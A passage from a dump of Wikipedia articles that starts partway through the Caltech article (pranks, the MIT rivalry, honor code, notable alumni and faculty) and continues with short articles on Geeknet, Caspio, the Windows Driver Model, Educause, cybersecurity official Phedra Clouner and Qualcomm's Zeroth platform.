In recent years, pranking has been officially encouraged by Tom Mannion, Caltech's Assistant VP for Student Affairs and Campus Life. "The grand old days of pranking have gone away at Caltech, and that's what we are trying to bring back," reported the Boston Globe.
In December 2011, Caltech students went to New York and pulled a prank in Manhattan's Greenwich Village. The prank involved making The Cube sculpture look like the Aperture Science Weighted Companion Cube from the video game Portal.
Caltech pranks have been documented in three Legends of Caltech books, the most recent of which was edited by alumni Autumn Looijen '99 and Mason Porter '98 and published in May 2007.
Rivalry with MIT
In 2005, a group of Caltech students pulled a string of pranks during MIT's Campus Preview Weekend for admitted students. These include covering up the word Massachusetts in the "Massachusetts Institute of Technology" engraving on the main building façade with a banner so that it read "That Other Institute of Technology". A group of MIT hackers responded by altering the banner so that the inscription read "The Only Institute of Technology." Caltech students also passed out T-shirts to MIT's incoming freshman class that had MIT written on the front and "...because not everyone can go to Caltech" along with an image of a palm tree on the back.
MIT retaliated in April 2006, when students posing as the Howe & Ser (Howitzer) Moving Company stole the 130-year-old, 1.7-ton Fleming House cannon and moved it over 3,000 miles to their campus in Cambridge, Massachusetts for their 2006 Campus Preview Weekend, repeating a similar prank performed by nearby Harvey Mudd College in 1986. Thirty members of Fleming House traveled to MIT and reclaimed their cannon on April 10, 2006.
On April 13, 2007 (Friday the 13th), a group of students from The California Tech, Caltech's campus newspaper, arrived and distributed fake copies of The Tech, MIT's campus newspaper, while prospective students were visiting for their Campus Preview Weekend. Articles included "MIT Invents the Interweb", "Architects Deem Campus 'Unfortunate'", and "Infinite Corridor Not Actually Infinite".
In December 2009, some Caltech students declared that MIT had been sold and had become the Caltech East campus. A "sold" banner was hung on front of the MIT dome building and a "Welcome to Caltech East: School of the Humanities" banner over the Massachusetts Avenue Entrance. Newspapers and T-shirts were distributed, and door labels and fliers in the infinite corridor were put up in accordance with the "curriculum change."
In September 2010, MIT students attempted to put a TARDIS, the time machine from the BBC's Doctor Who, onto a roof. Caught in midact, the prank was aborted. In January 2011, Caltech students in conjunction with MIT students helped put the TARDIS on top of Baxter. Caltech students then moved the TARDIS to UC Berkeley and Stanford.
In April 2014, during MIT's Campus Preview Weekend, a group of Caltech students handed out mugs emblazoned with the MIT logo on the front and the words "The Institute of Technology" on the back. When heated, the mugs turn orange, display a palm tree, and read "Caltech The Hotter Institute of Technology." Identical mugs continue to be sold at the Caltech campus store.
Honor code
Life in the Caltech community is governed by the honor code, which simply states: "No member of the Caltech community shall take unfair advantage of any other member of the Caltech community." This is enforced by a Board of Control, which consists of undergraduate students, and by a similar body at the graduate level, called the Graduate Honor Council.
The honor code aims at promoting an atmosphere of respect and trust that allows Caltech students to enjoy privileges that make for a more relaxed atmosphere. For example, the honor code allows professors to make the majority of exams as take-home, allowing students to take them on their own schedule and in their preferred environment.
Through the late 1990s, the only exception to the honor code, implemented earlier in the decade in response to changes in federal regulations, concerned the sexual harassment policy. Today, there are myriad exceptions to the honor code in the form of new Institute policies such as the fire policy and alcohol policy. Although both policies are presented in the Honor System Handbook given to new members of the Caltech community, some undergraduates regard them as a slight against the honor code and the implicit trust and respect it represents within the community. In recent years, the Student Affairs Office has also taken up pursuing investigations independently of the Board of Control and Conduct Review Committee, an implicit violation of both the honor code and written disciplinary policy that has contributed to further erosion of trust between some parts of the undergraduate community and the administration.
Notable people
, Caltech has 40 Nobel laureates to its name awarded to 24 alumni, which includes 5 Caltech professors who are also alumni (Carl D. Anderson, Linus Pauling, William A. Fowler, Edward B. Lewis, and Kip Thorne), and 16 non-alumni professors. The total number of Nobel Prizes is 41 because Pauling received prizes in both Chemistry and Peace. Eight faculty and alumni have received a Crafoord Prize from the Royal Swedish Academy of Sciences, while 58 have been awarded the U.S. National Medal of Science, and 11 have received the National Medal of Technology. One alumnus, Stanislav Smirnov, won the Fields Medal in 2010. Other distinguished researchers have been affiliated with Caltech as postdoctoral scholars (for example, Barbara McClintock, James D. Watson, Sheldon Glashow and John Gurdon) or visiting professors (for example, Albert Einstein, Stephen Hawking and Edward Witten).
Students
Caltech enrolled 987 undergraduate students and 1,410 graduate students for the 2021–2022 school year. Women made up 45% of the undergraduate and 33% of the graduate student body. The racial demographics of the school substantially differ from those of the nation as a whole.
The four-year graduation rate is 79% and the six-year rate is 92%, which is low compared to most leading U.S. universities, but substantially higher than it was in the 1960s and 1970s. Students majoring in STEM fields traditionally have graduation rates below 70%.
Alumni
There are 22,930 total living alumni in the U.S. and around the world. As of October 2020, 24 alumni and 16 non-alumni faculty have won the Nobel Prize. The Turing Award, the "Nobel Prize of Computer Science", has been awarded to six alumni, and one has won the Fields Medal.
Many alumni have participated in scientific research. Some have concentrated their studies on the very small universe of atoms and molecules. Nobel laureate Carl D. Anderson (BS 1927, PhD 1930) proved the existence of positrons and muons, Nobel laureate Edwin McMillan (BS 1928, MS 1929) synthesized the first transuranium element, Nobel laureate Leo James Rainwater (BS 1939) investigated the non-spherical shapes of atomic nuclei, and Nobel laureate Douglas D. Osheroff (BS 1967) studied the superfluid nature of helium-3. Donald Knuth (PhD 1963), the "father" of the analysis of algorithms, wrote The Art of Computer Programming and created the TeX computer typesetting system, which is commonly used in the scientific community. Bruce Reznick (BS 1973) is a mathematician noted for his contributions to number theory and the combinatorial-algebraic-analytic investigations of polynomials. Narendra Karmarkar (MS 1979) is known for the interior point method, a polynomial algorithm for linear programming known as Karmarkar's algorithm.
Other alumni have turned their gaze to the universe. C. Gordon Fullerton (BS 1957, MS 1958) piloted the third Space Shuttle mission. Astronaut (and later, United States Senator) Harrison Schmitt (BS 1957) was the only geologist to have ever walked on the surface of the moon. Astronomer Eugene Merle Shoemaker (BS 1947, MS 1948) co-discovered Comet Shoemaker-Levy 9 (a comet which crashed into the planet Jupiter) and was the first person buried on the moon (by having his ashes crashed into the moon). Astronomer George O. Abell (BS 1951, MS 1952, PhD 1957) while a grad student at Caltech participated in the National Geographic Society-Palomar Sky Survey. This ultimately resulted in the publication of the Abell Catalogue of Clusters of Galaxies, the definitive work in the field.
Undergraduate alumni founded, or co-founded, companies such as LCD manufacturer Varitronix, Hotmail, Compaq, MathWorks (which created Matlab), and database provider Imply, while graduate students founded, or co-founded, companies such as Intel, TRW, and the non-profit educational organization, the Exploratorium.
Arnold Beckman (PhD 1928) invented the pH meter and commercialized it with the founding of Beckman Instruments. His success with that company enabled him to provide seed funding for William Shockley (BS 1932), who had co-invented semiconductor transistors and wanted to commercialize them. Shockley became the founding Director of the Shockley Semiconductor Laboratory division of Beckman Instruments. Shockley had previously worked at Bell Labs, whose first president was another alumnus, Frank Jewett (BS 1898). Because his aging mother lived in Palo Alto, California, Shockley established his laboratory near her in Mountain View, California. Shockley was a co-recipient of the Nobel Prize in physics in 1956, but his aggressive management style and odd personality at the Shockley Lab became unbearable. In late 1957, eight of his researchers resigned and with support from Sherman Fairchild formed Fairchild Semiconductor. Among the "traitorous eight" was Gordon E. Moore (PhD 1954), who later left Fairchild to co-found Intel. Other offspring companies of Fairchild Semiconductor include National Semiconductor and Advanced Micro Devices, which in turn spawned more technology companies in the area. Shockley's decision to use silicon instead of germanium as the semiconductor material, coupled with the abundance of silicon semiconductor related companies in the area, gave rise to the term "Silicon Valley" to describe that geographic region surrounding Palo Alto.
Caltech alumni also held public offices, with Mustafa A.G. Abushagur (PhD 1984) the Deputy Prime Minister of Libya and Prime Minister-Elect of Libya, James Fletcher (PhD 1948) the 4th and 7th Administrator of NASA, Steven Koonin (PhD 1972) the Undersecretary of Energy for Science, and Regina Dugan (PhD 1993) the 19th director of DARPA. The 20th director for DARPA, Arati Prabhakar, is also a Caltech alumna (PhD 1984) as well as Charles Elachi (Phd 1971), former director of the Jet Propulsion Lab. Arvind Virmani is a former Chief Economic Adviser to the Government of India. In 2013, President Obama announced the nomination of France Cordova (PhD 1979) as the director of the National Science Foundation and Ellen Williams (PhD 1982) as the director for ARPA-E.
Faculty and staff
Richard Feynman was among the most well-known physicists associated with Caltech, having published the Feynman Lectures on Physics, an undergraduate physics text, and popular science texts such as Six Easy Pieces for the general audience. The promotion of physics made him a public figure of science, although his Nobel-winning work in quantum electrodynamics was already very established in the scientific community. Murray Gell-Mann, a Nobel-winning physicist, introduced a classification of hadrons and went on to postulate the existence of quarks, which is currently accepted as part of the Standard Model. Long-time Caltech President Robert Andrews Millikan was the first to calculate the charge of the electron with his well-known oil-drop experiment, while Richard Chace Tolman is remembered for his contributions to cosmology and statistical mechanics. 2004 Nobel Prize in Physics winner H. David Politzer is a current professor at Caltech, as is astrophysicist and author Kip Thorne and eminent mathematician Barry Simon. Linus Pauling pioneered quantum chemistry and molecular biology, and went on to discover the nature of the chemical bond in 1939. Seismologist Charles Richter, also an alumnus, developed the magnitude scale that bears his name, the Richter magnitude scale for measuring the power of earthquakes. One of the founders of the geochemistry department, Clair Patterson was the first to accurately determine the age of the Earth via lead:uranium ratio in meteorites. In engineering, Theodore von Kármán made many key advances in aerodynamics, notably his work on supersonic and hypersonic airflow characterization. A repeating pattern of swirling vortices is named after him, the von Kármán vortex street. Participants in von Kármán's GALCIT project included Frank Malina, who helped develop the WAC Corporal, which was the first U.S. rocket to reach the edge of space, Jack Parsons, a pioneer in the development of liquid and solid rocket fuels who designed the first castable composite-based rocket motor, and Qian Xuesen, who was dubbed the "Father of Chinese Rocketry". More recently, Michael Brown, a professor of planetary astronomy, discovered many trans-Neptunian objects, most notably the dwarf planet Eris, which prompted the International Astronomical Union to redefine the term "planet".
David Baltimore, the Robert A. Millikan Professor of Biology, and Alice Huang, Senior Faculty Associate in Biology, served as the presidents of AAAS from 2007 to 2008 and 2010 to 2011, respectively.
33% of the faculty are members of the National Academy of Sciences or Engineering and/or fellows of the American Academy of Arts and Sciences. This is the highest percentage of any faculty in the country with the exception of the graduate institution Rockefeller University.
The average salary for assistant professors at Caltech is $111,300, associate professors $121,300, and full professors $172,800. Caltech faculty are active in applied physics, astronomy and astrophysics, biology, biochemistry, biological engineering, chemical engineering, computer science, geology, mechanical engineering and physics.
Presidents
James Augustin Brown Scherer (1908–1920) (president of Throop College of Technology before the name change)
Robert A. Millikan (1921–1945), experimental physicist, Nobel laureate in physics for 1923 (his official title was "Chairman of the Executive Council")
Lee A. DuBridge (1946–1969), experimental physicist (first to officially hold the title of President)
Harold Brown (1969–1977), physicist and public servant (left Caltech to serve as United States Secretary of Defense in the administration of Jimmy Carter)
Robert F. Christy (1977–1978), astrophysicist (acting president)
Marvin L. Goldberger (1978–1987), theoretical physicist (left to serve as Director of Institute for Advanced Study)
Thomas E. Everhart (1987–1997), experimental physicist
David Baltimore (1997–2006), molecular biologist, Nobel laureate in Physiology or Medicine for 1975
Jean-Lou Chameau (2006–2013), civil engineer and educational administrator (left to serve as president of King Abdullah University of Science and Technology)
Thomas F. Rosenbaum (2014–), condensed matter physicist and administrator
Caltech startups
Over the years Caltech has actively promoted the commercialization of technologies developed within its walls. Through its Office of Technology Transfer & Corporate Partnerships, scientific breakthroughs have led to the transfer of numerous technologies in a wide variety of scientific-related fields such as photovoltaic, radio-frequency identification (RFID), semiconductors, hyperspectral imaging, electronic devices, protein design, solid state amplifiers and many more. Companies such as Contour Energy Systems, Impinj, Fulcrum Microsystems, Nanosys, Inc., Photon etc., Xencor, and Wavestream Wireless have emerged from Caltech.
In media and popular culture
Caltech has appeared in many works of popular culture, both as itself and in disguised form. On television, it plays a prominent role and is the workplace of all four male lead characters and one female lead character in the sitcom The Big Bang Theory. Caltech is also the inspiration, and frequent film location, for the California Institute of Science in Numb3rs. On film, the Pacific Tech of The War of the Worlds and Real Genius is based on Caltech.
In nonfiction, two 2007 documentaries examine aspects of Caltech: Curious, its researchers, and Quantum Hoops, its men's basketball team.
Given its Los Angeles-area location, the grounds of the Institute are often host to short scenes in movies and television. The Athenaeum dining club appears in the Beverly Hills Cop series, The X-Files, True Romance, and The West Wing.
See also
Engineering education
US-China University Presidents Roundtable
References
External links
Official athletics website
1891 establishments in California
Buildings and structures in Pasadena, California
Education in Pasadena, California
Educational institutions established in 1891
Engineering universities and colleges in California
Private universities and colleges in California
San Gabriel Valley
Schools accredited by the Western Association of Schools and Colleges
Science and technology in Greater Los Angeles
Technological universities in the United States
Universities and colleges in Los Angeles County, California
|
11690283
|
https://en.wikipedia.org/wiki/Geeknet
|
Geeknet
|
Geeknet, Inc. is a Fairfax County, Virginia–based company that is a subsidiary of GameStop. The company was formerly known as VA Research, VA Linux Systems, VA Software, and SourceForge, Inc.
History
VA Research
VA Research was founded in November 1993 by Stanford University graduate student Larry Augustin and James Vera. Augustin was a Stanford colleague of Jerry Yang and David Filo, the founders of Yahoo!. VA Research was one of the first vendors to build and sell personal computer systems installed with the Linux operating system, as an alternative to more expensive Unix workstations that were available at the time. During its initial years of operation, the business was profitable and grew quickly, with over $100 million in sales and a 10% profit margin in 1998. It was the largest vendor of pre-installed Linux computers, with approximately 20% of the Linux hardware market.
In October 1998, the company received investments of $5.4 million from Intel and Sequoia Capital.
In March and April 1999, VA Research purchased Enlightenment Solutions, marketing company Electric Lichen L.L.C., and VA's top competitor, Linux Hardware Solutions. That year, VA Research also won a business-plan competition for the right to operate the linux.com domain. In May 1999, VA created a Linux Labs division, hiring former linux.com domain holder and programmer Fred van Kempen, and programmers Jon "maddog" Hall, Geoff "Mandrake" Harrison, Jeremy Allison, Richard Morrell (who would later create Smoothwall as a project at VA Linux) and San "nettwerk" Mehat. In the summer of 1999, programmers Tony Guntharp, Uriah Welcome, Tim Perdue and Drew Streib began designing and developing SourceForge. SourceForge was released to the public at Comdex on November 17, 1999. VA began porting Linux to the new IA-64 processor architecture in earnest. Intel and Sequoia, along with Silicon Graphics and other investors, added an additional $25 million investment in June 1999.
Initial public offering
The company's largest customers included Akamai Technologies and eToys.
The company changed its name to VA Linux Systems. On December 9, 1999, the company became a public company via an initial public offering. The company raised $132 million, offering shares at $30/share, but the shares opened for trading at $299/share, before closing at $239.25/share, or 698% above the IPO price, breaking a record for the largest first day gain. Larry Augustin, the 38-year old founder and chief executive officer of the company, became a billionaire on paper and a 26-year old web developer at the company said she was worth $10 million on paper. By August 2000, the shares were trading at $40 each and only 24 mutual funds held the stock. On December 8, 2000, one year later, after the bursting of the dot com bubble, shares traded at $8.49/share. In January 2001, the stock traded at $7.13/share. By December 2002, it was worth just $1.19/share.
Acquisition of Andover.net
On February 3, 2000, the company announced that it was acquiring Andover.net for $800 million, a month after it became a public company. This acquisition gave VA Linux popular online media properties such as Slashdot, Andover News Network, Freshmeat, NewsForge (became a mirror of linux.com in 2007, mirrors geeknet.com since 2010), linux.com, ThinkGeek, and a variety of online software development resources. With this acquisition came a stable of writers such as Rob Malda, Robin Miller (Roblimo), Jack Bryar, Rod Amis, Jon Katz, and "CowboyNeal". The acquisition eventually allowed the company to shift its business model from Linux-based product sales to specialty media and software development support.
Japanese partnership
In September 2000, in partnership with Sumitomo Corporation, the company created a Japanese subsidiary, VA Linux Systems Japan KK, to promote Linux systems in Japan.
Sales growth
The company's sales grew to $17.7 million in 1999, up from $5.5 million in fiscal 1998. In fiscal 2000, the company's sales were $120.3 million.
VA Software
By 2001, VA Linux's original equipment and systems business model encountered stiff competition from other hardware vendors, such as Dell, that now offered Linux as a pre-installed operating system.
On June 26, 2001, VA Linux decided that it would leave the systems-hardware business and focus on software development. During the summer of 2001, all 153 of the hardware-focused employees were dismissed as a result of this shift in the company's business model.
On December 6, 2001, the company formally changed its name to VA Software, recognizing that the majority of the business was now software development and specialty news and information services. However, the company's Japanese subsidiary still uses the name "VA Linux Systems Japan K.K."
On January 2, 2002, the company's stock price plunged 42% after an earnings warning.
SourceForge and OSDN
In December 2003, VA Software marketed a proprietary SourceForge Enterprise Edition, re-written in Java for offshore outsourcing software development.
By April 2004, the company focused on SourceForge, an online software application, and OSDN, a group of websites catering to people in the information technology and software development industries, which was renamed to Open Source Technology Group (OSTG). At that time, the stock was trading at $1.94/share.
In January 2006, VA Software sold Animation Factory to Jupitermedia Corporation.
On April 24, 2007, the company sold SourceForge Enterprise Edition to CollabNet.
On May 24, 2007, VA Software changed its name to SourceForge Inc. and merged with OSTG.
On January 5, 2009, Scott Kauffman was appointed president and chief executive officer of SourceForge.
Geeknet
In November 2009, SourceForge, Inc. changed its name to Geeknet, Inc.
Geeknet president and chief executive officer Scott Kauffman resigned on August 4, 2010, and was replaced by executive chairman Kenneth Langone and the company changed its ticker symbol to GKNT.
On August 10, 2010, Jason Baird, the chief operations officer, and Michael Rudolph, the chief marketing officer resigned, both effective 31 August 2010. Jay Seirmarco, the chief technology officer also resigned, effective September 30, 2010.
Effective January 31, 2011, Geeknet appointed Matthew C. Blank, former chief executive officer and chairman of Showtime Networks as a member of its board of directors.
Later in 2011, the company renamed its Freshmeat website to Freecode.
In September 2012, Slashdot, SourceForge, and Freecode were sold to Dice Holdings for $20 million, leaving ThinkGeek as the sole property of Geeknet.
On May 26, 2015, it was announced that pop culture-oriented retailer Hot Topic had made an offer to acquire Geeknet for $17.50 per-share, valuing the company at $122 million. However, on May 29, 2015, it was revealed that an unspecified company had made a counter-offer of $20 per-share; Hot Topic was given until June 1, 2015, to exceed this new offer. On June 2, 2015, it was announced that video game retail chain GameStop would acquire Geeknet for $140 million, paying $20 per share. The deal closed on July 17, 2015.
References
External links
VA Linux Systems Japan K.K.
1999 initial public offerings
2015 mergers and acquisitions
Retail companies established in 1993
Companies based in Fairfax County, Virginia
Linux companies
Online publishing companies of the United States
Online retailers of the United States
Software companies based in Virginia
GameStop
1993 establishments in California
Software companies of the United States
|
20402111
|
https://en.wikipedia.org/wiki/Caspio
|
Caspio
|
Caspio is an American software company headquartered in Sunnyvale, California, with offices in Ukraine, Poland and the Philippines. Caspio was founded by Frank Zamani in 2000. The company focuses on database-centric web applications.
History
Caspio was founded by Frank Zamani in 2000. The company initially focused on simplifying custom cloud applications and reducing development time and cost as compared to traditional software development.
Caspio released the first version of its platform, Caspio Bridge, in 2001. In 2014, Caspio released a HIPAA-Compliant Edition of its low-code application development platform.
Caspio also released an EU General Data Protection Regulation (GDPR) Compliance Edition of its low-code application development platform in 2016. Caspio's second European Software Development Center opened in Kraków, Poland in 2017. Caspio also opened data centers in Montreal, Canada and India in 2020.
References
Online databases
Web applications
Cloud applications
Cloud platforms
Web development
Software development
Software development process
Cloud computing
Cloud computing providers
Information technology management
Types of databases
As a service
Software companies based in the San Francisco Bay Area
Software companies of the United States
2000 establishments in the United States
2000 establishments in California
Software companies established in 2000
Companies established in 2000
|
252077
|
https://en.wikipedia.org/wiki/Windows%20Driver%20Model
|
Windows Driver Model
|
In computing, the Windows Driver Model (WDM) also known at one point as the Win32 Driver Model is a framework for device drivers that was introduced with Windows 98 and Windows 2000 to replace VxD, which was used on older versions of Windows such as Windows 95 and Windows 3.1, as well as the Windows NT Driver Model.
Overview
WDM drivers are layered in a stack and communicate with each other via I/O request packets (IRPs). The Microsoft Windows Driver Model unified driver models for the Windows 9x and Windows NT product lines by standardizing requirements and reducing the amount of code that needed to be written. WDM drivers will not run on operating systems earlier than Windows 98 or Windows 2000, such as Windows 95 (before the OSR2 update that sideloads the WDM model), Windows NT 4.0 and Windows 3.1. By conforming to WDM, drivers can be binary compatible and source-compatible across Windows 98, Windows 98 Second Edition, Windows Me, Windows 2000, Windows XP, Windows Server 2003 and Windows Vista (for backwards compatibility) on x86-based computers. WDM drivers are designed to be forward-compatible so that a WDM driver can run on a version of Windows newer than what the driver was initially written for, but doing that would mean that the driver cannot take advantage of any new features introduced with the new version. WDM is generally not backward-compatible, that is, a WDM driver is not guaranteed to run on any older version of Windows. For example, Windows XP can use a driver written for Windows 2000 but will not make use of any of the new WDM features that were introduced in Windows XP. However, a driver written for Windows XP may or may not load on Windows 2000.
WDM exists in the intermediary layer of Windows 2000 kernel-mode drivers and was introduced to increase the functionality and ease of writing drivers for Windows. Although WDM was mainly designed to be binary and source compatible between Windows 98 and Windows 2000, this may not always be desired and so specific drivers can be developed for either operating system.
Device kernel-mode drivers
With the Windows Drivers Model (WDM) for devices Microsoft implements an approach to kernel mode drivers that is unique to Windows operating systems. WDM implements a layered architecture for device drivers, and every device of a computer is served by a stack of drivers. However, every driver in that stack can chain isolate hardware-independent features from the driver above and beneath it. So drivers in the stack do not need to interact directly with one another. WDM defines architecture and device procedures for a range of devices, such as display and the network card, known as Network Driver Interface Specification (NDIS). In the NDIS architecture the layered network drivers include lower-level drivers that manage the hardware and upper-level drivers that implement network data transport, such as the Transmission Control Protocol (TCP).
While WDM defines three types of device drivers, not all driver stacks for a given device contain all types of device drivers. The three WDM device driver types are:
Bus driver: For every bus on the mainboard there is a one bus driver, with the primary responsibility for the identification of all devices connected to that bus and responding to plug and play events. Microsoft will provide bus drivers as part of the operating system, such as PCI, PnPISA, SCSI, USB and FireWire.
Function driver: this is the principal driver for a device and it provides the operational interface for a device by handling read and write operations. Function drivers are written by the device vendors, and for their interaction with the hardware they depend on a specific bus driver being present in the Windows operating system.
Filter driver: This driver is optional, and can modify the behaviour of a device, such as input and output requests. These drivers can be implemented as lower-level and upper-level filter drivers.
Object-oriented driver stack
Function drivers and bus drivers are often implemented as driver/minidriver pairs, which in practice is either a class or miniclass, or a port or miniport pair.
Bus drivers for devices attached to a bus are implemented as class drivers and are hardware-agnostic. They will support the operations of a certain type of device. Windows operating systems include a number of class drivers, such as the kbdclass.sys driver for keyboards. Miniclass drivers on the other hand are supplied by the vendor of a device, and only support device specific operations, for a particular device of a given class.
Port drivers support general input/output (I/O) operations for a peripheral hardware interface. The core functionality of port drivers is mandated by the operating system, and Windows operating systems integrate a variety of port drivers. For example, the i8042prt.sys port driver for the 8042 microcontroller connects PS/2 keyboards to the mainboard peripheral bus. The miniport drivers, like the miniclass drivers, are supplied by the hardware vendors and support only device specific operations of peripheral hardware that is connected to a port on the mainboard.
Each driver that processes an I/O request for a device has a corresponding object, which is loaded into main memory. A device object is created by the Windows operating system from the associated device class. Device objects contain structures of type DEVICE_OBJECT, which store pointers to their driver. At run time these pointers are used to locate a driver's dispatch routine and member functions. In the WDM driver stack, the filter driver device object, known as the upper filter, will receive an I/O request packet (IRP) for a device from the I/O manager. If the upper filter driver can not serve the request, it will locate the object of the driver one step down in the driver stack. The IRP is passed down the driver stack by calling the function IoCallDrive(), and processed by the function driver device object, also known as functional device object. The function driver device object in turn may pass the IRP to the lower filter, another filter device object. Then the IRP may be passed down to the bus driver, which operates as the physical device object. The bus driver object is at the bottom of the driver stack, and interacts with the hardware abstraction layer, which is part of the Windows operating system kernel and allows Windows operating systems to run on a variety of processors, different memory management unit architectures, and a variety of computer systems with different I/O bus architectures. The execution of an IRP is finished when any of the driver objects in the stack returns the request back to the I/O manager, with the result and a status flag.
Device drivers for different Windows operating systems
The WDM framework was developed by Microsoft to simplify the communication between the operating system and drivers inside the kernel. In Windows operating systems, drivers are implemented as Dynamic Link Libraries .DLL or .SYS files. WDM compliant drivers must follow rules of design, initialisation, plug-and-play, power management and memory allocation. In practice WDM driver programmers reuse large pieces of code when building new object-oriented drivers. This means that drivers in the WDM stack may contain residual functionality, which is not documented in specifications. Drivers that have passed the Microsoft quality test are digitally signed by Microsoft. The Microsoft Hardware Compatibility Tests and the Driver Development Kit include reliability and stress tests.
A device driver that is not designed for a specific hardware component may allow another device to function. This is because the basic functionality of a hardware device class is similar. The functionality of the video card class, for example, allows the Microsoft Basic Display Adapter driver to work with a wide variety of video cards. However, installing the wrong driver for a device will mean that the full functionality of the device can not be used, and may result in poor performance and the destabilization of the Windows operating system. Hardware device vendors may release updated device drivers for particular Windows operating systems, to improve performance, add functionality or fix bugs. If a device is not working as expected the latest device drivers should be downloaded from the vendor website and installed.
Device drivers are designed for particular Windows operating system versions, and device drivers for a previous version of Windows may not work correctly or at all with other versions. Because many device drivers run in kernel mode installing drivers for a previous operating system version may destabilise the Windows operating system. Migrating a computer to a higher version of a Windows operating system therefore requires that new device drivers are installed for all hardware components. Finding up to date device drivers and installing them for Windows 10 has introduced complications into the migration process.
Common device driver compatibility issues include: a 32-bit device driver is required for a 32-bit Windows operating system, and a 64-bit device driver is required for a 64-bit Windows operating system. 64-bit device drivers must be signed by Microsoft, because they run in kernel mode and have unrestricted access to the computer hardware. For operating systems prior to Windows 10 Microsoft allowed vendors to sign their 64-bit drivers themselves, assuming vendors had undertaken compatibility tests. However, Windows 10 64-bit drivers now need to be signed by Microsoft. Therefore, device vendors have to submit their drivers to Microsoft for testing and approval. The driver installation package includes all files in the .inf directory, and all files in the package need to be installed, otherwise the installation of the device driver may fail. For operating system versions before Windows 10 not all files necessary for the driver installation were included in the package, as this requirement was not consistently enforced. Some device driver installers have a user interface GUI, often requiring user configuration input. The absence of a user interface does not mean that the installation of the device driver is not successful. Besides, Windows 10 device drivers are not allowed to include a user interface. The Network Driver Interface Specification (NDIS) 10.x is used for network devices by the Windows 10 operating system. Network device drivers for Windows XP use NDIS 5.x and may work with subsequent Windows operating systems, but for performance reasons network device drivers should implement NDIS 6.0 or higher. Similarly, WDDM is the driver model for Windows Vista and up, which replaces XPDM used in graphics drivers.
Device Manager
The Device Manager is a Control Panel applet in Microsoft Windows operating systems. It allows users to view and control the hardware attached to the computer. It allows users to view and modify hardware device properties, and is also the primary tool to manage device drivers.
Criticism
The Windows Driver Model, while a significant improvement over the VxD and Windows NT Driver Model used before it, has been criticised by driver software developers, most significantly for the following:
Interactions with power management events and plug and play are difficult. This can lead to situations where Windows machines cannot enter or exit sleep modes correctly due to bugs in driver code.
I/O cancellation is difficult to get right.
Complex boilerplate support code is required for every driver.
There is no support for writing pure user-mode drivers.
There were also a number of concerns about the quality of documentation and samples that Microsoft provided.
Because of these issues, Microsoft has released a new set of frameworks on top of WDM, called the Windows Driver Frameworks (WDF; formerly Windows Driver Foundation), which includes Kernel-Mode Driver Framework (KMDF) and User-Mode Driver Framework (UMDF). Windows Vista supports both pure WDM and the newer WDF. KMDF is also available for download for Windows XP and even Windows 2000, while UMDF is available for Windows XP and above.
See also
Windows Driver Frameworks (WDF)
Kernel-Mode Driver Framework (KMDF)
User-Mode Driver Framework (UMDF)
Windows Display Driver Model (WDDM)
References
Finnel, Lynn (2000). MCSE Exam 70-215, Microsoft Windows 2000 Server. Microsoft Press. .
Oney, Walter (2003). Programming the Windows Driver Model, Microsoft Press, .
External links
WDM Input Output Concepts - This article gives a high level overview of the I/O concepts as defined in the Windows Driver Model.
Windows driver API basics - This article informs you about the basics behind sound card drivers such as WDM, ASIO, MME, DirectX, etc.
Channel 9 Video - Interview with the Device Management and Installation team at Microsoft, primarily covering Plug-and-play.
- Free lecture notes book fragment detailing basic creation of Windows Drivers, Kernel Mode programming, and Memory management
Device drivers
Driver Model
Windows 98
|
3417956
|
https://en.wikipedia.org/wiki/Educause
|
Educause
|
Educause is a nonprofit association in the United States whose mission is "to advance higher education through the use of information technology". Membership is open to institutions of higher education, corporations serving the higher education information technology market, and other related associations and organizations.
Overview
The association provides networking and other platforms for higher education IT professionals to generate and find content on best practices and to engage their peers. Examples include professional development opportunities, print and electronic publications, including e-books and the magazine Educause Review (), strategic policy advocacy, teaching and learning initiatives, applied research, special interest discussion groups, awards for leadership, and a resource center for IT professionals, such as Campus Privacy Officers, in higher education.
Major initiatives of Educause include the Core Data Service, the Educause Center for Analysis and Research (ECAR), the Educause Learning Initiative (ELI), the Educause Policy Program, and the Educause/Internet2 Computer and Network Security Task Force. In addition, Educause manages the .edu Internet domain under a contract with the United States Department of Commerce. The technical aspects of the registry are managed by VeriSign.
The current membership of Educause comprises more than 2,300 colleges, universities, and educational organizations, including 300 corporations, with 16,500 active members.
Edupage
Edupage was a publication of Educause. It was a free three-time-a-week electronically distributed summary of technology news extracted from the mainstream media that was first released to a circulation of less than 100 in 1992. It was originally written by John Gehl and Suzanne Douglas, who left in April 1999 to devote their full attention to their company which publishes a daily newsletter similar to Edupage.
Edupage is currently in a publishing hiatus (since December 2006), as Educause looks at different ways to deliver resources and content to their audience.
History
Educause was formed from a merger of CAUSE and Educom in 1998. The two organizations were the two major information technology associations within higher education. CAUSE grew out of a users group known as the College and University Systems Exchange.
See also
Campus Consortium
Internet2
Worldware, term coined by the Valuable Viable Software (VVS) project of Educom
References
External links
EDUCAUSE Review Magazine
About Membership
Educause Center for Analysis and Research (ECAR)
Educause Learning Initiative (ELI)
Edupage Archives from 1993 - 1999
Official Edupage Archives from January 1999 - 2006
Educational charities based in the United States
Higher education in the United States
|
58741776
|
https://en.wikipedia.org/wiki/Phedra%20Clouner
|
Phedra Clouner
|
Phedra Clouner is a cybersecurity professional active in Belgium. On 10 August 2015, she was appointed to the role of deputy manager to the CCB (Center for Cybersecurity in Belgium, the central authority in charge of cybersecurity in Belgium).
Studies
Phedra Clouner graduated from the Université Libre de Bruxelles with a History Major in 2001.
Career
Clouner is the founder and administrator of FedISA Belgium, the Belgian branch of the federation for Information Lifecyle Management, Storage and Archiving.
On 10 August 2015, she was appointed to the role of deputy manager to the CCB (Center for Cybersecurity in Belgium, the central authority in charge of cybersecurity in Belgium). She carries out activities relating to the detection, observation and analysis of online security problems.
References
Year of birth missing (living people)
Living people
People in information technology
Université libre de Bruxelles alumni
|
45639654
|
https://en.wikipedia.org/wiki/Zeroth%20%28software%29
|
Zeroth (software)
|
Zeroth is a platform for brain-inspired computing from Qualcomm. It is based around a (NPU) AI accelerator chip and a software API to interact with the platform. It makes a form of machine learning known as deep learning available to mobile devices. It is used for image and sound processing, including speech recognition. The software operates locally rather than as a cloud application.
Mobile chip maker Qualcomm announced in March 2015 that it would bundle the software with its next major mobile device chip, the Snapdragon 820 processor.
Applications
Qualcomm demonstrated that the system could recognize human faces and gestures that it had seen before and detect and then search for different types of photo scenes.
Another potential application is to extend battery life by analyzing phone usage and powering down all or part of its capabilities without affecting the user experience.
See also
Neuromorphic computing
TrueNorth
SpiNNaker
